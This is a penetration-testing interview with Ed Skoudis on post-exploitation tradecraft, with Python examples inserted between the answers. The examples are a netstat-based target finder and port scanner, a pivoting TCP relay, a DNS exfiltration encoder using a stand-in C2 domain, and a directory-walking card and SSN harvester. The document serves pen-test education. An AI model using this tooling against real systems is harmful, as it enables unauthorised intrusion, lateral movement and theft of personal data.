Interview with Pen Testing Expert Ed Skoudis

Michael Buckbee
Published October 13, 2015
Last updated June 30, 2022

We’re very excited to present this Q&A with Ed Skoudis. Skoudis is a very large presence in the security world. Here’s just a snippet from his lengthy bio: founder of Counter Hack, sought-after instructor at the SANS Institute, creator of NetWars CyberCity, and winner of the US Army’s Order of Thor Medal.

We focused our questions on some of the essentials of post-exploitation techniques. Skoudis set us straight on definitions and methodologies. His answers also nicely complement our own series on pentesting basics.

Inside Out Security: Let’s say you’ve entered a target system and installed an APT or RAT …

Ed Skoudis: I’m not sure APT is the proper word here. One doesn’t install an “APT”. An APT is a threat actor, specifically a very skilled one. [See this definition of APT.]

Also, I’d prefer not to install a RAT during a penetration test. There is no need for one in modern pen testing. RATs tend to be too heavyweight and intrusive. Traditional RATs usually provide GUI control of the machine and a bunch of splashy doodads that aren’t required by a penetration tester.

Instead, when compromising a machine, I like to use a light-weight payload, such as a Metasploit Meterpreter or related tool to get some form of shell access.

IOS: Ok, so after you’re in what would be the next four or five steps you’d take?

ES: After gaining a toe-hold on the target machine, I would:

  1. Determine the privileges I’m running with.
  2. Determine the machine’s location on the network and its network configuration, including looking at its network interfaces (it might be dual-homed), hostname, IP address, MAC address, ARP cache, and DNS cache. It’s important to look for both IPv4 and IPv6 information from these sources, as many systems support IPv6 in addition to IPv4, and IPv6 tends not to get as much scrutiny from security tools as IPv4, making it a nice avenue of attack.
  3. Look for the active TCP connections this machine has with other systems, especially interesting protocols such as SMB (for Windows file sharing and domain authentication) or SSH (for secure remote shell).
  4. Check to see what security tools are installed, including anti-virus, application whitelisting, local firewall, etc.
  5. See if I can leverage its location on the network and active TCP connections to pivot to another host.

IOS: What are some must-have tools for post-exploitation?

ES: For Windows targets, there are plentiful PowerShell tools for privilege escalation, pillaging, and pivoting. One of the very best suites of these tools is PowerShell Empire, which rolls together some incredible functionality from a variety of other projects.

In addition to PowerShell Empire, Metasploit itself includes dozens of post-exploitation modules useful for dumping hashes, grabbing crypto keys, getting environment information (including security defenses), and much more.

IOS: What are some techniques and tools for working out local network topology?

ES: I prefer to gain as much information from a compromised machine about the network around it as I can before resorting to intrusive (and easily discovered) scanning. That’s why I like to grab ARP cache, DNS cache, and a list of active TCP connections before moving on. That information tells me about other hosts that the currently compromised one knows about. I’ll also grab the routing table, as it may indicate additional routers on the subnet.

After pillaging that local information from a system, I then start probing to look for other targets on the same subnet, as they will likely be more accessible than systems on separate networks. A ping sweep (IPv4) or a ping of a multicast address (IPv6) may turn up additional nearby hosts ripe for picking and which may have identical credentials to the system(s) I’ve currently compromised!

I then typically do small-scale port scans of very interesting ports to me, those associated with protocols where I may find more juicy attack surface, including TCP 21, 22, 23, 25, 80, 443, 445, 6000, and more.
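The enumerate-first, scan-second approach in the two answers above (read the compromised host's own connection table, then probe only a short list of interesting ports) worked through as an added Python example; it is not from the interview or from any tool it names. The `netstat`-style lines are constructed sample data, the port list is the one Skoudis gives, and since scanning real peers needs a live network the `__main__` block scans the local host instead.

```python
"""Added example: build a target list from a host's established TCP connections,
then run a small-scale connect scan of interesting ports against a target.
Not from the interview; SAMPLE_NETSTAT is constructed data."""
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor

# Ports named in the interview and the service a pentester expects behind them.
INTERESTING_PORTS = {21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp",
                     80: "http", 443: "https", 445: "smb", 6000: "x11"}

# Constructed `netstat -an` style output; Windows and Linux both print
# proto / local / remote / state in this column order.
SAMPLE_NETSTAT = """\
TCP    10.1.2.30:49211        10.1.2.10:445          ESTABLISHED
TCP    10.1.2.30:49302        10.1.2.55:22           ESTABLISHED
TCP    10.1.2.30:49303        10.1.2.55:22           TIME_WAIT
TCP    [fd00:1:2::30]:49400   [fd00:1:2::77]:445     ESTABLISHED
TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
UDP    10.1.2.30:137          *:*
"""


def split_endpoint(endpoint):
    """'10.1.2.10:445' or '[fd00:1:2::77]:445' -> (ip, port)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def established_peers(netstat_text):
    """Return {peer_ip: {ports}} for ESTABLISHED TCP connections only.
    Listeners, wildcard addresses and half-closed connections are skipped;
    IPv6 peers are kept, since they are the ones scanners tend to miss."""
    peers = {}
    for line in netstat_text.splitlines():
        cols = line.split()
        if len(cols) < 4 or cols[0] != "TCP" or cols[3] != "ESTABLISHED":
            continue
        ip, port = split_endpoint(cols[2])
        if ipaddress.ip_address(ip).is_unspecified:
            continue
        peers.setdefault(ip, set()).add(port)
    return peers


def label(ip, port):
    """Human-readable line for a known peer, noting the IP family."""
    fam = "v6" if ipaddress.ip_address(ip).version == 6 else "v4"
    return f"{ip} ({fam}) tcp/{port} {INTERESTING_PORTS.get(port, '?')}"


def probe(ip, port, timeout=0.5):
    """One TCP connect; the socket family follows the address literal."""
    fam = socket.AF_INET6 if ":" in ip else socket.AF_INET
    with socket.socket(fam, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((ip, port)) == 0


def scan(ip, ports=INTERESTING_PORTS, timeout=0.5, workers=8):
    """Small-scale scan of one host; returns the sorted list of open ports."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, probe(ip, p, timeout)), ports))
    return sorted(p for p, is_open in results if is_open)


if __name__ == "__main__":
    for ip, ports in established_peers(SAMPLE_NETSTAT).items():
        for p in sorted(ports):
            print("known peer:", label(ip, p))
    # The peers above are constructed, so demonstrate the scanner on localhost.
    print("open on 127.0.0.1:", scan("127.0.0.1"))
```

The parser deliberately keeps only ESTABLISHED rows: TIME_WAIT and LISTENING entries say nothing about who the host actually talks to, and the wildcard check drops `0.0.0.0`/`::` listeners that would otherwise look like peers.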

IOS: How do you go about moving around the network?

ES: I use a variety of methods for lateral movement, including the pivoting features of Meterpreter; the msfconsole route command and Meterpreter’s portfwd command are quite useful.

On systems where Netcat is already installed (most Linuxes), I rely on Netcat relays of various types, including listener-to-client relays, but also client-to-client and listener-to-listener relays.

On Windows targets, I really love the “netsh interface portproxy” feature to forward ports through the machine, especially its ability to listen on a given port on IPv4 and then shoot data out to another port using IPv6. As far as TCP is concerned at Layer 4, it’s a single connection. But, we switch out the underlying Layer 3 protocol (from IPv4 to IPv6) underneath a single TCP connection. It’s beautiful.
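A listener-to-client relay of the kind the Netcat and netsh portproxy answers above describe, written as an added Python example (it is not from the interview, Netcat, Metasploit or netsh). It accepts connections on an IPv4 listener and bridges each one to a target address that may be IPv6, which is the v4-in, v6-out trick Skoudis praises in netsh: each side sees one ordinary TCP stream while the network layer changes in the middle. The echo server is a constructed stand-in for the service behind the pivot; all addresses and ports are assumptions.

```python
"""Added example: a threaded TCP relay that listens on one address family and
connects out on whatever family the target address uses (IPv4 -> IPv6 in the
demo).  Not from the interview; the echo server is a constructed stand-in."""
import socket
import threading


def _pump(src, dst):
    """Copy bytes one way until EOF, then half-close the destination so the
    far end sees the same FIN the original client sent."""
    try:
        while chunk := src.recv(4096):
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class Relay:
    def __init__(self, listen_addr, target_addr):
        self.target_addr = target_addr
        fam = socket.AF_INET6 if ":" in listen_addr[0] else socket.AF_INET
        self.sock = socket.socket(fam, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind(listen_addr)
        self.sock.listen(16)
        self.port = self.sock.getsockname()[1]

    def _bridge(self, client):
        # create_connection resolves the target's family itself, so the
        # outbound leg can be IPv6 while the inbound leg is IPv4.
        try:
            upstream = socket.create_connection(self.target_addr, timeout=5)
        except OSError:
            client.close()
            return
        upstream.settimeout(None)
        for a, b in ((client, upstream), (upstream, client)):
            threading.Thread(target=_pump, args=(a, b), daemon=True).start()

    def serve(self):
        while True:
            try:
                client, _ = self.sock.accept()
            except OSError:
                return  # listener closed by stop()
            threading.Thread(target=self._bridge, args=(client,), daemon=True).start()

    def start(self):
        threading.Thread(target=self.serve, daemon=True).start()
        return self.port

    def stop(self):
        self.sock.close()


def echo_server(bind_addr):
    """Constructed stand-in for the service behind the pivot: echoes input."""
    fam = socket.AF_INET6 if ":" in bind_addr[0] else socket.AF_INET
    srv = socket.socket(fam, socket.SOCK_STREAM)
    srv.bind(bind_addr)
    srv.listen(5)

    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def round_trip(relay_host, relay_port, payload):
    """Connect through the relay, send payload, return everything echoed back."""
    with socket.create_connection((relay_host, relay_port), timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)
        out = b""
        while chunk := c.recv(4096):
            out += chunk
    return out


def ipv6_loopback_available():
    """True if this host can bind ::1, i.e. the v4-to-v6 demo can run."""
    if not socket.has_ipv6:
        return False
    try:
        with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
            s.bind(("::1", 0))
        return True
    except OSError:
        return False


if __name__ == "__main__":
    target_host = "::1" if ipv6_loopback_available() else "127.0.0.1"
    srv, tport = echo_server((target_host, 0))
    relay = Relay(("127.0.0.1", 0), (target_host, tport))
    rport = relay.start()
    print(f"127.0.0.1:{rport} -> [{target_host}]:{tport}:",
          round_trip("127.0.0.1", rport, b"hello through the pivot"))
    relay.stop()
    srv.close()
```

The half-close in `_pump` is what makes the relay transparent: a client that sends its request and shuts down its write side gets exactly that FIN delivered to the target, so protocols that rely on EOF (or a one-shot `nc` client) behave the same through the pivot as they would directly.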

IOS: What are some of the ways exfiltration of data can be accomplished without it being detected?

ES: First, encryption. In many organizations, simply sending the data across a TLS connection will get the job done. Still, they may see the large transfer. If I need to be more subtle, I’ll consider moving data across a command-and-control channel over DNS or a related protocol. A slow dribble is far less likely to be detected than a smash-and-grab, but will still demonstrate the business risk a professional pen tester is hired to show.
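How a DNS-borne channel of the kind mentioned above actually carries data, as an added Python example that is not from the interview. The file is cut into pieces that respect the DNS limits (63-octet labels, 253-octet names), each query name carries a hex sequence number so the receiving side can reorder and notice gaps, and a helper turns a query rate into the transfer time that the "slow dribble" costs. The DNS transport itself (sending the names as queries to a server the tester controls) is left out so the code runs offline; `c2.example.com` and the size constants are assumptions.

```python
"""Added example: framing and reassembly for a DNS-style exfiltration channel.
Only the encoding is shown; no queries are sent.  Not from the interview."""
import base64

MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # and a whole textual name at most 253 octets


def frame(data, domain, seq_width=4):
    """Cut `data` into query names: <seq>.<label>[.<label>...].<domain>.

    base32 keeps the payload inside the DNS alphabet and survives resolvers
    that fold case; the hex sequence label lets the receiver reorder chunks.
    """
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    # characters left for payload once the seq label, domain and two dots are counted
    budget = MAX_NAME - seq_width - len(domain) - 2
    labels_per_query = max(1, budget // (MAX_LABEL + 1))
    step = labels_per_query * MAX_LABEL
    names = []
    for seq, off in enumerate(range(0, len(b32), step)):
        piece = b32[off:off + step]
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        name = f"{seq:0{seq_width}x}." + ".".join(labels) + "." + domain
        assert len(name) <= MAX_NAME
        names.append(name)
    return names


def reassemble(names, domain):
    """Inverse of frame().  Names under other domains are ignored; a gap in the
    sequence raises ValueError so the receiver can request a resend (a missing
    *final* chunk would need a length marker, which this example omits)."""
    suffix = "." + domain
    parts = {}
    for name in names:
        if not name.endswith(suffix):
            continue
        seq, _, body = name[:-len(suffix)].partition(".")
        parts[int(seq, 16)] = body.replace(".", "")
    expected = set(range(max(parts) + 1)) if parts else set()
    missing = sorted(expected - set(parts))
    if missing:
        raise ValueError(f"missing chunk(s): {missing}")
    b32 = "".join(parts[i] for i in range(len(parts))).upper()
    b32 += "=" * (-len(b32) % 8)   # restore the base32 padding stripped in frame()
    return base64.b32decode(b32)


def payload_per_query(domain, seq_width=4):
    """Approximate bytes of original data one query carries under `domain`."""
    budget = MAX_NAME - seq_width - len(domain) - 2
    return max(1, budget // (MAX_LABEL + 1)) * MAX_LABEL * 5 // 8


def transfer_minutes(nbytes, domain, queries_per_minute):
    """How long a dribble at the given rate takes: the stealth-versus-speed knob."""
    queries = -(-nbytes // payload_per_query(domain))
    return queries / queries_per_minute


if __name__ == "__main__":
    secret = b"customer export, constructed sample " * 40
    names = frame(secret, "c2.example.com")
    print(len(secret), "bytes ->", len(names), "queries, e.g.", names[0][:60] + "...")
    print("at 2 queries/minute:", transfer_minutes(len(secret), "c2.example.com", 2), "min")
    assert reassemble(names, "c2.example.com") == secret
```

Two things worth noticing for the defensive reader: every query name here is close to the 253-octet ceiling and built from high-entropy labels, which is exactly the shape DNS-monitoring rules key on, and the only way the attacker makes the channel quieter is to lower `queries_per_minute`, which `transfer_minutes` shows costs them proportionally more time.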

IOS: How does one search for PII and other sensitive content?

ES: Understanding the business use of a compromised machine is a vital step here. What does the machine do, and where does it store its information to do that? This usually gets me in the right direction.

I search using typical file system commands, such as cd, ls, find, grep, and so forth on Linux, and cd, dir, findstr, etc. on Windows.  In PowerShell on Windows, we have some additional great features for searching through the file system.

There are specific tools for finding things like social security numbers and credit cards on targets, but I find that they tend to produce a lot of disk access and noise in the target environment, another item that may get a pen tester noticed and perhaps even blocked.
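A lightweight search for card numbers and SSNs of the kind discussed in the last two answers, as an added Python example that is not from the interview or from any of the tools it refers to. Loose regexes find candidates, then a Luhn check and the SSA issuance rules (areas 000, 666 and 900 and above are never assigned; group 00 and serial 0000 are invalid) discard most of the noise, so the hit list is short enough to read by hand; the directory walker reads only small text files, which keeps the disk access Skoudis warns about to a minimum. The sample document, file extensions and size cap are constructed assumptions.

```python
"""Added example: find credit card numbers and US SSNs in text with validity
checks so that false positives are filtered out.  Not from the interview;
SAMPLE is a constructed document."""
import os
import re

# Candidate patterns are deliberately loose; validation does the filtering.
CARD_RE = re.compile(r"(?<![\d-])(?:\d[ -]?){13,19}(?![\d-])")
SSN_RE = re.compile(r"(?<!\d)(\d{3})-(\d{2})-(\d{4})(?!\d)")


def luhn_ok(digits):
    """Luhn checksum: every second digit from the right is doubled."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def ssn_plausible(area, group, serial):
    """SSA rules: area 000, 666 and 900-999 are never issued; group and
    serial cannot be all zeros."""
    a = int(area)
    return a not in (0, 666) and a < 900 and group != "00" and serial != "0000"


def find_pii(text):
    """Return [(kind, masked_value)] so a report never repeats the full value."""
    hits = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            hits.append(("card", digits[:6] + "*" * (len(digits) - 10) + digits[-4:]))
    for m in SSN_RE.finditer(text):
        if ssn_plausible(*m.groups()):
            hits.append(("ssn", "***-**-" + m.group(3)))
    return hits


def scan_tree(root, max_bytes=1 << 20, exts=(".txt", ".csv", ".log")):
    """Walk a directory, reading only small text-like files to limit disk I/O.
    Returns {path: hits} for files that contained something."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not name.lower().endswith(exts) or os.path.getsize(path) > max_bytes:
                continue
            with open(path, errors="replace") as fh:
                hits = find_pii(fh.read())
            if hits:
                findings[path] = hits
    return findings


# Constructed sample: one real-looking card, one that fails Luhn, one valid
# SSN, two impossible SSNs, and digit runs that a naive regex would flag.
SAMPLE = """\
order 1001 card 4111 1111 1111 1111 exp 09/27
invoice id 4111111111111112 (not a card: fails Luhn)
employee ssn 123-45-6789, test value 000-12-3456, other 666-01-2345
phone 555-123-4567 and timestamp 20220630123456
"""

if __name__ == "__main__":
    for kind, value in find_pii(SAMPLE):
        print(kind, value)
```

Masking in `find_pii` is deliberate: a pen-test report that lists full card numbers or SSNs creates a second copy of the very data the client is paying to protect, while first-six/last-four and last-four-of-SSN are enough to locate the record again.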

IOS: Finally, any recent trends you can comment on?

ES: Yes, attacks using PowerShell are really on the rise, and there are some tremendous tools like PowerShell Empire for modeling such attacks in pen tests. Furthermore, attacks against Windows Kerberos are an increasing vector today.

IOS: Thanks Ed!
